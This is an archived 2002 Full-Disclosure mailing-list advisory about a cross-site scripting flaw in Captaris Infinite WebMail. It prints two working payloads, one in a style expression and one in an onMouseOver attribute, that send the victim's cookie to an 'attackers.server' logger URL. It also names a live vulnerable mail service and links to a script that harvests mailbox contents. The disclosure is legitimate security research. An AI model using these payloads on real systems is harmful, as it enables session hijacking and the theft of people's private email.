[Full-Disclosure] Captaris (Infinite) WebMail XSS

• Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2002:293-09] Updated Fetchmail packages fix security vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I figured it was about time I hopped on the XSS band-wagon.

Captaris (www.captaris.com) Infinite WebMail application is vulnerable to
Cross-Site Scripting (XSS) attacks. The application fails to filter the
following tags that can both be used to redirect a user to an attack script:

Launch on e-mail open:
    <p style="left:expression(document.location=
    'http://attackers.server/cgi-bin/logger.cgi?'
    +document.cookie)">

Launch on mouse over:
    <b onMouseOver= "document.location=
    'http://attackers.server/cgi-bin/logger.cgi?'
    +document.cookie\">

I am sure there are other XSS attack methods that can also be utilized to
bypass their basic filtering.

A sample vulnerable service is provided by dog.com (www.dogmail.com), they
are running WebMail v3.61.05. A sample cookie and mail logger script that
will retrieve all of the messages in the users main mailbox has been
attached, and can also be found at
http://pedram.redhive.com/advisories/dogmail.cgi

-pedram
http://pedram.redhive.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Next message: Gregory Steuck: "[Full-Disclosure] Re: Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD"
• Previous message: bugzillaat_private: "[Full-Disclosure] [RHSA-2002:293-09] Updated Fetchmail packages fix security vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Dec 18 2002 - 16:11:08 PST